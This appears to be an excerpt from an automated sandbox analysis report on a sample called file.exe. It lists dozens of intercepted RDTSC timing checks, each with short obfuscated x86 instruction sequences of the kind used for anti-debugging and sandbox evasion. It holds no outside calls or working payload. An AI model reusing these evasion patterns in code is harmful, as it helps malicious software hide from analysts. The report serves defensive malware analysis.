                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4050 second address: AB406D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA934C8B32Bh 0x0000000b jng 00007FA934C8B326h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB406D second address: AB4084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA9347D66C2h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4084 second address: AB4089 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4089 second address: AB4097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jp 00007FA9347D66B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB44D8 second address: AB44DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB44DC second address: AB44E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4770 second address: AB4774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB48DE second address: AB4904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FA9347D66CEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4904 second address: AB4912 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4A46 second address: AB4A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4A4E second address: AB4A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA934C8B326h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4BB7 second address: AB4BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BDh 0x00000007 jmp 00007FA9347D66BCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FA9347D66B6h 0x00000017 jmp 00007FA9347D66C7h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4BF4 second address: AB4C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4C00 second address: AB4C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4EDC second address: AB4F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA934C8B326h 0x00000009 jmp 00007FA934C8B335h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4F00 second address: AB4F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7C37 second address: AB7C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7C3C second address: AB7C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABBF59 second address: ABBF76 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA934C8B326h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FA934C8B326h 0x00000017 jne 00007FA934C8B326h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABBF76 second address: ABBFA4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA9347D66C5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA9347D66C1h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABBFA4 second address: ABBFAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABBB9E second address: ABBBA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC22E2 second address: AC22E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0C4B second address: AC0C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0EB3 second address: AC0EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B338h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FA934C8B326h 0x0000000f jmp 00007FA934C8B335h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC1206 second address: AC120C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC120C second address: AC1211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC1397 second address: AC139C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC139C second address: AC13A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA934C8B326h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC13A6 second address: AC13D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007FA9347D66B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FA9347D66BCh 0x00000012 jne 00007FA9347D66B6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jnl 00007FA9347D66BEh 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC13D0 second address: AC13DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA934C8B326h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73FCD second address: A73FDB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73FDB second address: A73FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73FDF second address: A74045 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FA9347D66C5h 0x00000013 mov ebx, dword ptr [ebp+1248815Ah] 0x00000019 mov edx, dword ptr [ebp+122D3A2Ch] 0x0000001f add eax, ebx 0x00000021 jc 00007FA9347D66B9h 0x00000027 movzx edx, di 0x0000002a push eax 0x0000002b jmp 00007FA9347D66BDh 0x00000030 mov dword ptr [esp], eax 0x00000033 mov dword ptr [ebp+122D368Fh], edi 0x00000039 movsx edx, si 0x0000003c push 00000004h 0x0000003e sbb edi, 65F8FB96h 0x00000044 nop 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jnc 00007FA9347D66B6h 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74045 second address: A74067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c ja 00007FA934C8B32Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC1516 second address: AC1535 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jc 00007FA9347D66C0h 0x00000011 jmp 00007FA9347D66BAh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC1535 second address: AC1539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC519A second address: AC51AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA9347D66BDh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC51AB second address: AC51B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC51B3 second address: AC51BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC51BB second address: AC51BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC51BF second address: AC51E5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FA9347D66B6h 0x00000012 jmp 00007FA9347D66C4h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC51E5 second address: AC520B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d jmp 00007FA934C8B335h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC520B second address: AC520F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC520F second address: AC5219 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA934C8B326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5219 second address: AC522F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA9347D66BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC522F second address: AC5233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4A6E second address: AC4A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007FA9347D66BEh 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4C0F second address: AC4C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4E81 second address: AC4E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C4h 0x00000007 jp 00007FA9347D66C2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC99E2 second address: AC99E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9017 second address: AC9034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 jnl 00007FA9347D66BAh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 je 00007FA9347D66CAh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC91BB second address: AC91CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA934C8B326h 0x0000000a js 00007FA934C8B326h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC91CB second address: AC91EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA9347D66C1h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC91EE second address: AC9209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9209 second address: AC9213 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9213 second address: AC921D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA934C8B32Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC939A second address: AC93A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC95F7 second address: AC95FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC95FD second address: AC9612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FA9347D66BDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A310BE second address: A310D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnl 00007FA934C8B326h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEBF1 second address: ACEBFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FA9347D66BEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEBFE second address: ACEC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEC04 second address: ACEC2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 jmp 00007FA9347D66BBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e jmp 00007FA9347D66BFh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73919 second address: A7398D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA934C8B326h 0x0000000a popad 0x0000000b add dword ptr [esp], 6E9662B8h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FA934C8B328h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c call 00007FA934C8B329h 0x00000031 jmp 00007FA934C8B335h 0x00000036 push eax 0x00000037 jno 00007FA934C8B334h 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 jng 00007FA934C8B334h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF4B4 second address: ACF4D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C3h 0x00000007 pushad 0x00000008 jg 00007FA9347D66B6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF82E second address: ACF832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF832 second address: ACF838 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF838 second address: ACF842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA934C8B326h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACFAF0 second address: ACFAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACFAF5 second address: ACFB3B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA934C8B32Ch 0x00000008 push esi 0x00000009 jno 00007FA934C8B326h 0x0000000f jmp 00007FA934C8B32Bh 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 jmp 00007FA934C8B338h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jl 00007FA934C8B326h 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5B69 second address: AD5B87 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA9347D66C2h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5B87 second address: AD5B8C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8798 second address: AD87BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA9347D66C8h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87BB second address: AD87C9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87C9 second address: AD87CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87CD second address: AD87D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87D3 second address: AD87D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87D9 second address: AD87DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87DF second address: AD87E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8933 second address: AD8939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8E7E second address: AD8EBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA9347D66C3h 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007FA9347D66C4h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jne 00007FA9347D66B6h 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8FED second address: AD8FF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FA934C8B326h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF1E8 second address: ADF20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA9347D66CBh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF5FB second address: ADF601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF601 second address: ADF606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF606 second address: ADF61F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B333h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF61F second address: ADF623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF623 second address: ADF63C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B335h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF76B second address: ADF77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA9347D66B6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADFBD7 second address: ADFC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007FA934C8B334h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e jne 00007FA934C8B326h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADFC01 second address: ADFC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADFC0A second address: ADFC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0A16 second address: AE0A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
